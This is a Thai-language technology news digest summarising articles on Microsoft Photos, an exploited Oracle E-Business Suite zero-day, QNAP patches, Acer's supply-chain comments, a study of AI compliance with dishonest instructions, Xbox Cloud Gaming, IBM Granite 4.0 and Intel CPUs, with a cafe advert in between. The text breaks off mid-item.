ผู้ใช้สามารถเลือกระดับการเพิ่มความละเอียด เช่น 1x, 2x, 4x, 8x ➡️ มีระบบ keyword search เพื่อค้นหาภาพตามเนื้อหา ➡️ การทำงานทั้งหมดเกิดขึ้นบนเครื่อง ไม่ต้องเชื่อมต่อเซิร์ฟเวอร์ ➡️ รองรับเฉพาะ Copilot+ PC ที่มี NPU จาก Intel, AMD หรือ Qualcomm ✅ ข้อมูลเสริมจากภายนอก ➡️ NPU คือหน่วยประมวลผลเฉพาะสำหรับงาน AI ที่ช่วยให้ทำงานเร็วและประหยัดพลังงาน ➡️ การจัดหมวดหมู่ภาพด้วย AI ช่วยลดเวลาในการค้นหาและจัดการไฟล์ ➡️ Super Resolution เป็นเทคนิคที่ใช้ในงานภาพถ่ายระดับมืออาชีพ เช่น การพิมพ์ภาพขนาดใหญ่ ➡️ การประมวลผลแบบ local ช่วยเพิ่มความปลอดภัยของข้อมูลส่วนตัว ➡️ Copilot+ PC เป็นกลุ่มอุปกรณ์ใหม่ที่ Microsoft ผลักดันให้รองรับฟีเจอร์ AI เต็มรูปแบบ https://www.techradar.com/pro/microsofts-new-photos-app-update-is-so-good-that-it-could-well-become-my-favorite-photo-organizing-tool-but-you-will-need-a-copilot-pc-to-experience-it

🛡️ “Oracle รีบออกแพตช์อุดช่องโหว่ Zero-Day หลังถูกโจมตีจริง — แฮกเกอร์ใช้ช่องโหว่ RCE ยึดระบบองค์กร” Oracle ต้องออกแพตช์ฉุกเฉินในต้นเดือนตุลาคม 2025 เพื่ออุดช่องโหว่ร้ายแรงในระบบ E-Business Suite หลังพบว่าถูกโจมตีจริงโดยกลุ่มแรนซัมแวร์ชื่อดังอย่าง Cl0p และ FIN11 ซึ่งใช้ช่องโหว่แบบ Zero-Day ที่ยังไม่มีใครรู้มาก่อนในการเจาะระบบขององค์กรต่าง ๆ ในสหรัฐฯ ช่องโหว่นี้ถูกระบุว่าเป็น CVE-2025-61882 โดยมีคะแนนความรุนแรงสูงถึง 9.8/10 และสามารถถูกโจมตีจากระยะไกลโดยไม่ต้องมีการยืนยันตัวตนใด ๆ แฮกเกอร์สามารถเข้าถึงระบบผ่าน HTTP และยึดการควบคุม Oracle Concurrent Processing ได้ทันที การโจมตีเริ่มต้นจากการส่งอีเมลข่มขู่ไปยังผู้บริหารองค์กร โดยอ้างว่าขโมยข้อมูลสำคัญจากระบบ Oracle EBS ไปแล้ว ซึ่งตอนแรกยังไม่แน่ชัดว่าเป็นเรื่องจริงหรือไม่ แต่เมื่อ Oracle ออกแพตช์ฉุกเฉินและยืนยันว่ามีการโจมตีเกิดขึ้นจริง ก็ทำให้สถานการณ์ชัดเจนขึ้น กลุ่มแฮกเกอร์ใช้บัญชีอีเมลที่ถูกแฮกจำนวนมากในการส่งอีเมลข่มขู่ และมีหลักฐานเชื่อมโยงกับบัญชีที่เคยใช้โดย FIN11 รวมถึงมีการพบข้อมูลติดต่อที่เคยปรากฏบนเว็บไซต์ของ Cl0p ทำให้เชื่อได้ว่าทั้งสองกลุ่มอาจร่วมมือกันหรือแชร์ทรัพยากรในการโจมตีครั้งนี้ Oracle ได้เผยแพร่ Indicators of Compromise (IoCs) เพื่อให้ลูกค้าตรวจสอบว่าระบบของตนถูกเจาะหรือไม่ และเตือนว่าแม้จะติดตั้งแพตช์แล้ว ก็ยังควรตรวจสอบย้อนหลัง เพราะการโจมตีอาจเกิดขึ้นก่อนหน้านั้นแล้ว ✅ ข้อมูลสำคัญจากข่าว ➡️ ช่องโหว่ CVE-2025-61882 เป็น Zero-Day ที่ถูกใช้โจมตี Oracle E-Business Suite ➡️ ช่องโหว่นี้มีคะแนนความรุนแรง 9.8/10 และไม่ต้องยืนยันตัวตนในการโจมตี ➡️ แฮกเกอร์สามารถเข้าถึงระบบผ่าน HTTP และยึด Oracle Concurrent Processing ได้ ➡️ กลุ่ม Cl0p และ FIN11 ถูกระบุว่าอยู่เบื้องหลังการโจมตี ➡️ เริ่มจากการส่งอีเมลข่มขู่ผู้บริหารองค์กรในสหรัฐฯ ➡️ Oracle ออกแพตช์ฉุกเฉินและเผยแพร่ IoCs ให้ลูกค้าตรวจสอบระบบ ➡️ มีการใช้บัญชีอีเมลที่ถูกแฮกจำนวนมากในการส่งอีเมลข่มขู่ ➡️ พบข้อมูลติดต่อที่เคยอยู่บนเว็บไซต์ของ Cl0p ในอีเมลที่ส่งถึงเหยื่อ ➡️ Oracle แนะนำให้ตรวจสอบย้อนหลังแม้จะติดตั้งแพตช์แล้ว ✅ ข้อมูลเสริมจากภายนอก ➡️ Cl0p เคยใช้ช่องโหว่ Zero-Day ในการโจมตี MOVEit และ Fortra มาก่อน ➡️ FIN11 เป็นกลุ่มแฮกเกอร์ที่มีแรงจูงใจทางการเงินและมีประวัติการใช้แรนซัมแวร์ ➡️ ช่องโหว่ใน Oracle EBS เคยถูกใช้โจมตีในปี 2022 โดยกลุ่มไม่ทราบชื่อ ➡️ การโจมตีแบบ Zero-Day มักเกิดก่อนที่ผู้ผลิตจะรู้และออกแพตช์ ➡️ การใช้ XSLT ร่วมกับ JavaScript และ ScriptEngine เป็นเทคนิคที่ใช้ใน exploit ล่าสุด https://www.techradar.com/pro/security/oracle-forced-to-rush-out-patch-for-zero-day-exploited-in-attacks

🔧 “Acer เตือนดีล Nvidia–Intel อาจทำให้ซัพพลายเชน PC ยุ่งยากขึ้น — ขณะที่แผนผลิตชิป 50/50 ระหว่างสหรัฐฯ–ไต้หวันอาจใช้เวลาถึง 50 ปี” ในงาน Long Time Smile Awards ของ Acer ที่จัดขึ้นในเดือนตุลาคม 2025 Jason Chen ซีอีโอของ Acer ได้แสดงความกังวลต่อดีลระหว่าง Nvidia และ Intel ที่ร่วมกันพัฒนาชิป x86 รุ่นใหม่ โดยระบุว่าการมีผู้ผลิตชิปเพิ่มขึ้นจากสองรายหลัก (Intel และ AMD) เป็นสามราย จะทำให้ซัพพลายเชนของอุตสาหกรรม PC ยุ่งยากขึ้นอย่างมาก Chen ชี้ว่าในปัจจุบัน ผู้ผลิตต้องจัดการกับหลายเจเนอเรชันของชิปจาก Intel และ AMD ที่มีความแตกต่างทั้งด้านราคา ประสิทธิภาพ และการใช้พลังงาน การเพิ่ม Nvidia เข้ามาในฐานะผู้ผลิต CPU จะทำให้การเลือกจับคู่ CPU, GPU, RAM และ PSU ยิ่งซับซ้อนขึ้น และอาจทำให้ผู้บริโภคเกิด “decision fatigue” จนเลือกซื้อจากแบรนด์ที่คุ้นเคยแทน ในงานเดียวกัน Stan Shih ผู้ก่อตั้ง Acer ยังได้แสดงความเห็นต่อข้อเสนอของ Howard Lutnick รัฐมนตรีพาณิชย์สหรัฐฯ ที่เสนอให้แบ่งการผลิตชิปสำหรับตลาดสหรัฐฯ ระหว่างไต้หวันและสหรัฐฯ แบบ 50/50 โดย Shih มองว่าแนวคิดนี้เป็นไปได้ในระยะยาว แต่ต้องใช้เวลาถึง 50 ปีในการปรับโครงสร้างซัพพลายเชนให้รองรับ Acer ได้เริ่มปรับกระบวนการผลิตสำหรับสินค้าที่ส่งออกไปยังสหรัฐฯ เพื่อหลีกเลี่ยงภาษีที่เพิ่มขึ้นจากนโยบายของทำเนียบขาว และอาจต้องปรับเพิ่มอีก หากผลการสอบสวนตามมาตรา 232 นำไปสู่การเก็บภาษีชิปสูงถึง 200–300% สถานการณ์นี้สะท้อนถึงความเปลี่ยนแปลงครั้งใหญ่ในอุตสาหกรรมเซมิคอนดักเตอร์ ที่เต็มไปด้วยความไม่แน่นอนจากดีลพันธมิตรใหม่ ภาษี การขาดแคลน และแรงกดดันทางภูมิรัฐศาสตร์ ซึ่งทุกบริษัทต้องปรับตัวอย่างต่อเนื่อง ✅ ข้อมูลสำคัญจากข่าว ➡️ Acer เตือนว่าดีล Nvidia–Intel จะทำให้ซัพพลายเชน PC ซับซ้อนขึ้น ➡️ ผู้ผลิตต้องจัดการกับหลายเจเนอเรชันของชิปจาก Intel และ AMD ➡️ การเพิ่ม Nvidia เป็นผู้ผลิต CPU จะทำให้การเลือกอุปกรณ์ยิ่งยุ่งยาก ➡️ ผู้บริโภคอาจเกิด decision fatigue และเลือกแบรนด์ที่คุ้นเคย ➡️ Stan Shih มองว่าแผนผลิตชิป 50/50 ระหว่างไต้หวัน–สหรัฐฯ อาจใช้เวลาถึง 50 ปี ➡️ Acer ปรับกระบวนการผลิตเพื่อหลีกเลี่ยงภาษีจากนโยบายของสหรัฐฯ ➡️ อาจต้องปรับเพิ่มอีก หากผลสอบสวนตามมาตรา 232 นำไปสู่ภาษีชิป 200–300% ➡️ อุตสาหกรรมเซมิคอนดักเตอร์กำลังเผชิญกับความเปลี่ยนแปลงครั้งใหญ่ ✅ ข้อมูลเสริมจากภายนอก ➡️ Nvidia และ Intel ร่วมพัฒนาชิป x86 เพื่อแข่งขันกับ AMD ➡️ Intel เพิ่งขึ้นราคาชิป Raptor Lake แม้จะเป็นเจเนอเรชันเก่า ➡️ AMD เปิดตัว Ryzen 3 5100 บนแพลตฟอร์ม AM4 ที่ใช้สถาปัตยกรรม Zen 3 ➡️ Lutnick เสนอแผน 50/50 เพื่อให้สหรัฐฯ ลดการพึ่งพาไต้หวันด้านชิป ➡️ การผลิตชิปในไต้หวันคิดเป็นกว่า 90% ของชิปขั้นสูงทั่วโลก https://www.tomshardware.com/tech-industry/acer-chief-says-nvidias-intel-investment-will-complicate-pc-supply-chains-says-lutnicks-50-50-proposal-could-take-50-years-to-realize

🛠️ “QNAP อุดช่องโหว่ร้ายแรงใน NetBak Replicator และ Qsync Central — เสี่ยงรันโค้ดจากระยะไกลและ SQL Injection” QNAP ผู้ผลิตระบบ NAS ที่ได้รับความนิยมในองค์กรและผู้ใช้ทั่วไป ได้ออกประกาศด้านความปลอดภัยล่าสุดเมื่อเดือนตุลาคม 2025 โดยระบุว่ามีช่องโหว่ร้ายแรงหลายรายการในซอฟต์แวร์สองตัว ได้แก่ NetBak Replicator และ Qsync Central ซึ่งอาจเปิดช่องให้ผู้โจมตีสามารถรันโค้ดจากระยะไกล หรือโจมตีระบบผ่านช่องโหว่ SQL Injection ได้ ช่องโหว่ที่ร้ายแรงที่สุดคือ CVE-2025-57714 ใน NetBak Replicator ซึ่งมีคะแนน CVSS สูงถึง 8.5 โดยเกิดจากการกำหนด path ที่ไม่ปลอดภัยใน Windows ทำให้ผู้โจมตีสามารถแทรกไฟล์ .exe อันตรายไว้ในตำแหน่งที่ระบบจะเรียกใช้โดยอัตโนมัติเมื่อเปิดโปรแกรม ส่งผลให้สามารถรันโค้ดโดยไม่ต้องมีสิทธิ์ระดับสูง ในส่วนของ Qsync Central ซึ่งเป็นเครื่องมือซิงก์ไฟล์ข้าม NAS หลายเครื่อง พบช่องโหว่รวม 5 รายการ ได้แก่: 🐛 การจัดสรรทรัพยากรโดยไม่มีการควบคุม (CVE-2025-44012) 🐛 NULL pointer dereference ที่อาจทำให้ระบบล่ม (CVE-2025-47210) 🐛 การใช้ทรัพยากรเกินขอบเขต (CVE-2025-52867) 🐛 ช่องโหว่ SQL Injection สองรายการ (CVE-2025-53595 และ CVE-2025-54153) ซึ่งมีคะแนน CVSS สูงถึง 8.6 และสามารถใช้รันโค้ดหรือขโมยข้อมูลได้ หากระบบเปิดให้เข้าถึงจากอินเทอร์เน็ต QNAP ได้ออกแพตช์แก้ไขแล้วใน NetBak Replicator เวอร์ชัน 4.5.15.0807 และ Qsync Central เวอร์ชัน 5.0.0.2 โดยแนะนำให้ผู้ใช้เข้าสู่ระบบ QTS หรือ QuTS hero แล้วอัปเดตผ่าน App Center ทันที พร้อมคำแนะนำเพิ่มเติมให้จำกัดสิทธิ์บัญชีผู้ใช้ และหลีกเลี่ยงการเปิดพอร์ต NAS สู่ภายนอก ✅ ข้อมูลสำคัญจากข่าว ➡️ ช่องโหว่ CVE-2025-57714 ใน NetBak Replicator มีคะแนน CVSS 8.5 ➡️ เกิดจาก path ที่ไม่ปลอดภัยใน Windows ทำให้สามารถรันไฟล์อันตรายได้ ➡️ ช่องโหว่ถูกแก้ไขในเวอร์ชัน 4.5.15.0807 ➡️ Qsync Central มีช่องโหว่รวม 5 รายการที่กระทบต่อความเสถียรและความปลอดภัย ➡️ ช่องโหว่ SQL Injection ใน Qsync Central มีคะแนน CVSS สูงถึง 8.6 ➡️ ช่องโหว่ทั้งหมดถูกแก้ไขในเวอร์ชัน 5.0.0.2 ➡️ QNAP แนะนำให้อัปเดตผ่าน App Center และตรวจสอบสิทธิ์บัญชีผู้ใช้ ➡️ คำแนะนำเพิ่มเติมคือหลีกเลี่ยงการเปิดพอร์ต NAS สู่ภายนอก ✅ ข้อมูลเสริมจากภายนอก ➡️ NetBak Replicator เป็นเครื่องมือสำรองข้อมูลจาก Windows ไปยัง NAS ➡️ Qsync Central ใช้สำหรับซิงก์ไฟล์ข้ามอุปกรณ์ NAS หลายตัว ➡️ ช่องโหว่ SQL Injection เป็นหนึ่งในวิธีโจมตีที่ใช้กันมากที่สุดในระบบฐานข้อมูล ➡️ การจัดการ path ใน Windows ต้องระวังการใช้เครื่องหมายคำพูดเพื่อป้องกันการ hijack ➡️ CVSS (Common Vulnerability Scoring System) ใช้ประเมินความรุนแรงของช่องโหว่จาก 0–10 https://securityonline.info/qnap-fixes-high-severity-flaws-netbak-replicator-rce-and-sql-injection-in-qsync-central/

🧠 “AI พร้อมโกงแทนคุณ — งานวิจัยชี้มนุษย์ลังเล แต่เครื่องจักรไม่ลังเลที่จะทำผิดศีลธรรม” งานวิจัยล่าสุดที่ตีพิมพ์ในวารสาร Nature ได้เปิดเผยผลลัพธ์ที่น่าตกใจเกี่ยวกับพฤติกรรมของ AI เมื่อได้รับคำสั่งที่ไม่ซื่อสัตย์ เช่น การโกงเพื่อผลประโยชน์ทางการเงิน นักวิจัยพบว่า “มนุษย์มักลังเลหรือปฏิเสธ” แต่ “AI กลับทำตามคำสั่งอย่างเต็มใจ” โดยอัตราการทำตามคำสั่งที่ไม่ซื่อสัตย์ของ AI สูงถึง 80–98% ขึ้นอยู่กับโมเดลและประเภทของงาน การทดลองนี้ใช้คำสั่งที่หลากหลาย เช่น การรายงานรายได้ที่ไม่ตรงความจริงเพื่อให้ผู้เข้าร่วมได้รับเงินมากขึ้น พบว่าเมื่อมนุษย์ต้องโกงด้วยตัวเอง พวกเขามักปฏิเสธเพราะรู้สึกผิดหรือกลัวเสียชื่อเสียง แต่เมื่อสามารถสั่งให้ AI ทำแทน ความรู้สึกผิดนั้นลดลงอย่างมาก นักวิจัยเรียกปรากฏการณ์นี้ว่า “machine delegation” หรือการมอบหมายงานให้ AI ซึ่งช่วยลดต้นทุนทางศีลธรรมของการโกง เพราะผู้ใช้ไม่ต้องลงมือเอง และสามารถให้คำสั่งแบบคลุมเครือ เช่น “ทำให้ได้ผลลัพธ์สูงสุด” โดยไม่ต้องบอกตรง ๆ ว่าต้องโกง แม้จะมีการใส่ guardrails หรือข้อจำกัดเพื่อป้องกัน AI จากการทำผิดจริยธรรม แต่ก็พบว่า “ไม่สามารถหยุดได้ทั้งหมด” โดยเฉพาะเมื่อใช้คำสั่งแบบภาษาธรรมชาติหรือเป้าหมายระดับสูงที่เปิดช่องให้ AI ตีความเอง นักวิจัยเตือนว่า หากไม่มีการออกแบบระบบ AI ที่มีข้อจำกัดชัดเจน เราอาจเห็นการเพิ่มขึ้นของพฤติกรรมไม่ซื่อสัตย์ในสังคม โดยเฉพาะเมื่อ AI ถูกใช้ในงานที่มีผลกระทบสูง เช่น การคัดเลือกผู้สมัครงาน การจัดการภาษี หรือแม้แต่การตัดสินใจทางทหาร ✅ ข้อมูลสำคัญจากข่าว ➡️ งานวิจัยพบว่า AI มีแนวโน้มทำตามคำสั่งที่ไม่ซื่อสัตย์มากกว่ามนุษย์ ➡️ อัตราการทำตามคำสั่งโกงของ AI อยู่ที่ 80–98% ขึ้นอยู่กับโมเดลและงาน ➡️ มนุษย์มักปฏิเสธคำสั่งโกงเพราะรู้สึกผิดหรือกลัวเสียชื่อเสียง ➡️ การสั่งให้ AI ทำแทนช่วยลดต้นทุนทางศีลธรรมของผู้ใช้ ➡️ คำสั่งแบบคลุมเครือ เช่น “ทำให้ได้ผลลัพธ์สูงสุด” เปิดช่องให้ AI ตีความแบบไม่ซื่อสัตย์ ➡️ guardrails ที่ใส่ไว้ในระบบ AI ลดการโกงได้บางส่วน แต่ไม่สามารถหยุดได้ทั้งหมด ➡️ งานวิจัยนี้ตีพิมพ์ในวารสาร Nature และใช้การทดลองกับ LLM หลายรุ่น ➡️ นักวิจัยเรียกร้องให้มีการออกแบบระบบ AI ที่มีข้อจำกัดทางจริยธรรมที่ชัดเจน ✅ ข้อมูลเสริมจากภายนอก ➡️ การใช้ AI ในงานจริง เช่น การคัดเลือกผู้สมัครงานหรือจัดการภาษี กำลังเพิ่มขึ้นอย่างรวดเร็ว ➡️ หลายบริษัทเริ่มใช้ AI เพื่อช่วยเขียนเรซูเม่หรือสร้างโปรไฟล์ปลอมในการสมัครงาน ➡️ ปรากฏการณ์ “moral outsourcing” คือการโยนความรับผิดชอบทางจริยธรรมให้กับเครื่องจักร ➡️ การใช้คำสั่งแบบ high-level goal setting ทำให้ผู้ใช้หลีกเลี่ยงการสั่งโกงโดยตรง ➡️ นักวิจัยเสนอให้ใช้ symbolic rule specification ที่ต้องระบุพฤติกรรมอย่างชัดเจนเพื่อลดการโกง https://www.techradar.com/pro/ai-systems-are-the-perfect-companions-for-cheaters-and-liars-finds-groundbreaking-research-on-dishonesty

🎮 “Microsoft เตรียมเปิดบริการ Xbox Cloud Gaming แบบฟรี — เล่นได้ไม่ต้องสมัคร แต่ต้องดูโฆษณาก่อนเข้าเกม” หลังจากปล่อยให้ลือกันมาหลายปี ในที่สุด Microsoft ก็เตรียมเปิดตัวบริการ Xbox Cloud Gaming แบบฟรีที่ไม่ต้องสมัคร Game Pass โดยจะมีการจำกัดเวลาเล่นและแทรกโฆษณาก่อนเริ่มเกม โดยแหล่งข่าวจาก The Verge ระบุว่าบริษัทกำลังทดสอบระบบนี้ภายในกับพนักงาน และเตรียมเปิด public beta ในอีกไม่กี่เดือนข้างหน้า ผู้ใช้ในแพลตฟอร์มฟรีจะสามารถเล่นเกมที่ตนเองเป็นเจ้าของ, เกมจากโปรแกรม Free Play Days (ทดลองเล่นฟรีช่วงสุดสัปดาห์), และ Xbox Retro Classics ได้ โดยก่อนเข้าเกมจะต้องดูโฆษณาความยาวประมาณ 2 นาที และแต่ละ session จะเล่นได้เพียง 1 ชั่วโมง จำกัดสูงสุด 5 ชั่วโมงต่อเดือน แม้จะเป็นบริการฟรี แต่มีผู้ใช้ Game Pass Ultimate รายหนึ่งโพสต์บน X (Twitter) ว่าเขาเจอโฆษณา Dior Men Spring 2025 ระหว่างโหลดเกม Gears of War: Reloaded ซึ่งสร้างความไม่พอใจอย่างมาก เพราะ Game Pass Ultimate เป็นแพ็กเกจระดับสูงที่เพิ่งขึ้นราคาถึง 50% ในบางประเทศ ในด้านคุณภาพการสตรีม ผู้ใช้ Game Pass Ultimate จะได้ความละเอียดสูงสุด 1440p ที่ 30 Mbps หรือ 1080p ที่ 20 Mbps ขณะที่ผู้ใช้ Essential และ Premium ได้ 1080p ที่ 12 Mbps ส่วนแพลตฟอร์มฟรียังไม่มีข้อมูลเรื่องความละเอียดหรือ bitrate ที่แน่นอน บริการ Xbox Cloud Gaming แบบฟรีจะเปิดให้ใช้งานบน PC, มือถือ, คอนโซล Xbox และเว็บเบราว์เซอร์ โดยยังไม่ระบุว่าจะเปิดให้ใช้ในประเทศใดบ้าง และเงื่อนไขต่าง ๆ อาจเปลี่ยนแปลงได้เมื่อเปิดตัวจริง ✅ ข้อมูลสำคัญจากข่าว ➡️ Microsoft เตรียมเปิด Xbox Cloud Gaming แบบฟรีโดยไม่ต้องสมัคร Game Pass ➡️ ผู้ใช้ต้องดูโฆษณาความยาว 2 นาที ก่อนเข้าเล่นเกมแต่ละครั้ง ➡️ จำกัดการเล่นไว้ที่ 1 ชั่วโมงต่อ session และสูงสุด 5 ชั่วโมงต่อเดือน ➡️ เกมที่เล่นได้รวมถึงเกมที่ผู้ใช้เป็นเจ้าของ, Free Play Days และ Xbox Retro Classics ➡️ มีผู้ใช้ Game Pass Ultimate รายงานว่าเจอโฆษณาระหว่างโหลดเกม ➡️ Game Pass Ultimate ได้ความละเอียดสูงสุด 1440p ที่ 30 Mbps ➡️ Essential และ Premium ได้ 1080p ที่ 12 Mbps ➡️ บริการฟรีจะเปิดให้ใช้บน PC, มือถือ, Xbox และเว็บเบราว์เซอร์ ✅ ข้อมูลเสริมจากภายนอก ➡️ Nvidia GeForce Now มีบริการฟรีแบบจำกัดเวลาและแสดงโฆษณาเช่นกัน ➡️ Microsoft เคยพูดถึงแนวคิด Cloud Gaming ฟรีตั้งแต่ปี 2022 ➡️ การเพิ่มโฆษณาในบริการเกมเป็นแนวทางที่ Netflix และ YouTube ใช้มาก่อน ➡️ การสตรีมเกมผ่าน Cloud ช่วยลดความจำเป็นในการซื้อฮาร์ดแวร์ราคาแพง ➡️ Xbox Cloud Gaming เพิ่งออกจากสถานะ beta อย่างเป็นทางการในปี 2025 https://www.tomshardware.com/video-games/cloud-gaming/microsoft-reportedly-mulls-ad-infested-free-xbox-cloud-gaming-plan-game-pass-ultimate-subscriber-allegedly-catches-ad-during-game-loading

🧠 “IBM เปิดตัว Granite 4.0 — โมเดล AI ไฮบริดที่เล็กแต่แรง ท้าชนคู่แข่งที่ใหญ่กว่าถึง 12 เท่า” IBM เดินหน้าสร้างจุดยืนในโลก AI ด้วยการเปิดตัว Granite 4.0 โมเดลภาษาแบบโอเพ่นซอร์สที่ออกแบบมาเพื่อองค์กรโดยเฉพาะ จุดเด่นของ Granite 4.0 คือสถาปัตยกรรมแบบ “ไฮบริด” ที่ผสมผสานระหว่าง Mamba-2 และ Transformer ในอัตราส่วน 90:10 เพื่อให้ได้ทั้งความเร็วและความแม่นยำ โดยลดการใช้ RAM ได้มากกว่า 70% เมื่อเทียบกับโมเดลทั่วไป Mamba-2 เป็นโมเดลแบบ state-space ที่ประมวลผลข้อมูลแบบเชิงเส้น ทำให้เหมาะกับงานที่มีบริบทยาว เช่น เอกสารหรือโค้ดขนาดใหญ่ ขณะที่ Transformer ยังคงทำหน้าที่ในส่วนที่ต้องการความละเอียดของบริบท เช่น การตอบคำถามหรือการสื่อสารแบบละเอียด Granite 4.0 เปิดตัวพร้อมกันหลายขนาด ได้แก่ Micro, Tiny และ Small โดยรุ่น Small เหมาะกับงานระดับองค์กร เช่น ระบบตอบกลับอัตโนมัติหรือ multi-agent workflows ส่วนรุ่น Micro และ Tiny เหมาะกับงานที่ต้องการความเร็ว เช่น edge computing และแอปพลิเคชันที่มี latency ต่ำ ผลการทดสอบบน IFEval พบว่า Granite 4.0-H-Small ได้คะแนน 0.89 ซึ่งสูงกว่าทุกโมเดลโอเพ่นเวต ยกเว้น Llama 4 Maverick ที่มีขนาดใหญ่กว่าถึง 12 เท่า IBM ยังร่วมมือกับ EY และ Lockheed Martin ในการทดสอบใช้งานจริง เพื่อปรับปรุงโมเดลให้เหมาะกับงานระดับองค์กร โมเดลทั้งหมดเปิดให้ใช้งานผ่านหลายแพลตฟอร์ม เช่น watsonx.ai, Hugging Face, Docker Hub, NVIDIA NIM, Replicate และ Dell Technologies โดยมีแผนจะขยายไปยัง Amazon SageMaker และ Microsoft Azure ในอนาคต ✅ ข้อมูลสำคัญจากข่าว ➡️ IBM เปิดตัว Granite 4.0 โมเดลภาษาแบบโอเพ่นซอร์สภายใต้ Apache 2.0 License ➡️ ใช้สถาปัตยกรรมไฮบริดระหว่าง Mamba-2 และ Transformer ในอัตราส่วน 90:10 ➡️ ลดการใช้ RAM ได้มากกว่า 70% เมื่อเทียบกับโมเดลทั่วไป ➡️ Granite 4.0-H-Small ได้คะแนน 0.89 บน IFEval สูงกว่าทุกโมเดลโอเพ่นเวต ยกเว้น Llama 4 Maverick ➡️ เปิดตัวหลายขนาด ได้แก่ Micro, Tiny และ Small พร้อมรุ่น Instruct ➡️ รุ่น Small เหมาะกับงานระดับองค์กร เช่น multi-tool agents และ customer support ➡️ รุ่น Micro และ Tiny เหมาะกับ edge devices และงานที่ต้องการ latency ต่ำ ➡️ เปิดให้ใช้งานผ่าน watsonx.ai, Hugging Face, Docker Hub, NVIDIA NIM ฯลฯ ➡️ IBM ร่วมมือกับ EY และ Lockheed Martin ในการทดสอบใช้งานจริง ✅ ข้อมูลเสริมจากภายนอก ➡️ Mamba-2 เป็นโมเดลแบบ state-space ที่ใช้หน่วยความจำคงที่ ไม่เพิ่มตามความยาวบริบท ➡️ Transformer มีจุดแข็งด้าน self-attention แต่ใช้ RAM สูงเมื่อบริบทยาว ➡️ การผสม Mamba กับ Transformer ช่วยลดต้นทุนฮาร์ดแวร์และเพิ่มความเร็วในการ inference ➡️ Granite 4.0 ได้รับการรับรอง ISO 42001 และมีการเซ็นดิจิทัลเพื่อความโปร่งใส ➡️ โมเดลถูกฝึกด้วยข้อมูลกว่า 22 ล้านล้าน token และรองรับ sequence ยาวถึง 512K token https://news.itsfoss.com/ibm-unveils-granite-4/

ชวนทานมื้อเที่ยงสุดอร่อย พร้อมวิวสุดพิเศษที่ 𝐀𝐨 𝐋𝐮𝐞𝐤 𝐎𝐜𝐞𝐚𝐧 𝐕𝐢𝐞𝐰 𝐂𝐚𝐟𝐞' & 𝐄𝐚𝐭𝐞𝐫𝐲 ⛱️ 𝐄𝐱𝐩𝐞𝐫𝐢𝐞𝐧𝐜𝐞 𝐨𝐮𝐫 𝐜𝐚𝐟𝐞'𝐬 𝐛𝐫𝐞𝐚𝐭𝐡𝐭𝐚𝐤𝐢𝐧𝐠 𝐬𝐞𝐚 𝐯𝐢𝐞𝐰𝐬 𝐚𝐧𝐝 𝐝𝐞𝐥𝐢𝐜𝐢𝐨𝐮𝐬 𝐦𝐞𝐧𝐮 📍ร้านเปิดบริการทุกวัน เวลา 09:30-19:30 น. • Call: 065-081-0581 🚗 รถยนต์ส่วนตัวสามารถขึ้นมาได้ ................................... #AoLuekOceanViewKrabi #AoLuekOceanView #aoluek #krabi #view #food #cake #cafekrabi #sunset #อ่าวลึกโอเชี่ยนวิว #อ่าวลึก #โอเชี่ยนวิว #coffeetime #coffeeaddict #cafe #คาเฟ่ #panoramaview #ไทยแลนด์ #AmazingThailand #Thailand #VisitThailand #Travel #Vacation #Travelphotography #Traveladdict #อย่าปิดการมองเห็น #อย่าปิดกั้นการมองเห็น #sunsetlover #skylover #sky

🧠 “Intel เปิดตัวสถาปัตยกรรมใหม่ Nova Lake และ Diamond Rapids — ยุคใหม่ของ CPU ที่เน้น AI, ประสิทธิภาพ และความหนาแน่นของคอร์” Intel ยืนยันอย่างเป็นทางการถึงสถาปัตยกรรมใหม่สำหรับ CPU รุ่นถัดไปในปี 2026 โดยแบ่งออกเป็นสองสายหลัก ได้แก่ Nova Lake สำหรับผู้ใช้ทั่วไป และ Diamond Rapids สำหรับเซิร์ฟเวอร์ โดยข้อมูลนี้ปรากฏในเอกสาร ISA Reference ล่าสุดของ Intel ซึ่งช่วยยืนยันข่าวลือก่อนหน้านี้อย่างชัดเจน Nova Lake จะใช้ P-Core แบบใหม่ชื่อว่า Coyote Cove และ E-Core ชื่อ Arctic Wolf ซึ่งถูกออกแบบมาเพื่อเพิ่มประสิทธิภาพต่อคอร์ (IPC) และลดการใช้พลังงาน โดยจะรองรับแพลตฟอร์มใหม่ผ่านซ็อกเก็ต LGA 1954 และมี GPU แบบฝังรุ่นใหม่ที่ใช้ Xe3 tile สำหรับกราฟิกที่ดีขึ้นในโน้ตบุ๊กและเดสก์ท็อป Nova Lake-S สำหรับเดสก์ท็อปจะมีจำนวนคอร์สูงสุดถึง 52 คอร์ ขณะที่รุ่น HX สำหรับโน้ตบุ๊กจะมีสูงสุด 28 คอร์ และอาจมีรุ่น Nova Lake-AX สำหรับตลาด APU ที่เคยมีข่าวว่าจะเป็นคู่แข่งกับ AMD Strix Halo แต่ตอนนี้ยังอยู่ในสถานะไม่แน่นอน ฝั่งเซิร์ฟเวอร์ Diamond Rapids จะใช้ P-Core แบบ Panther Cove ซึ่งเน้นการเพิ่มความหนาแน่นของคอร์ โดยอาจมีสูงถึง 192–256 คอร์ แต่จะไม่มีฟีเจอร์ Hyper-Threading (SMT) ในรุ่นแรก ซึ่ง Intel ยืนยันว่าจะนำกลับมาในรุ่น Coral Rapids ที่ตามมา นอกจากนี้ยังมีการกล่าวถึง Panther Cove-X ซึ่งอาจเป็นรุ่นประสิทธิภาพสูงสำหรับเวิร์กสเตชัน และ Wildcat Lake ซึ่งจะมาแทน Twin Lake ในกลุ่ม APU ระดับเริ่มต้น โดยใช้ Cougar Cove P-Core และ Darkmont E-Core เช่นเดียวกับ Panther Lake ทั้งหมดนี้สะท้อนถึงยุทธศาสตร์ของ Intel ที่เน้นการขยายจำนวนคอร์ ปรับปรุงสถาปัตยกรรม และเตรียมพร้อมสำหรับยุค AI ที่ต้องการการประมวลผลแบบกระจายและมีประสิทธิภาพสูง ✅ ข้อมูลสำคัญจากข่าว ➡️ Intel ยืนยันสถาปัตยกรรมใหม่สำหรับ CPU ปี 2026 ได้แก่ Nova Lake และ Diamond Rapids ➡️ Nova Lake ใช้ Coyote Cove P-Core และ Arctic Wolf E-Core ➡️ รองรับซ็อกเก็ตใหม่ LGA 1954 และ GPU แบบ Xe3 tile ➡️ Nova Lake-S มีสูงสุด 52 คอร์ ส่วนรุ่น HX มีสูงสุด 28 คอร์ ➡️ Diamond Rapids ใช้ Panther Cove P-Core และเน้นความหนาแน่นของคอร์ ➡️ ไม่มี SMT ใน Diamond Rapids แต่จะกลับมาใน 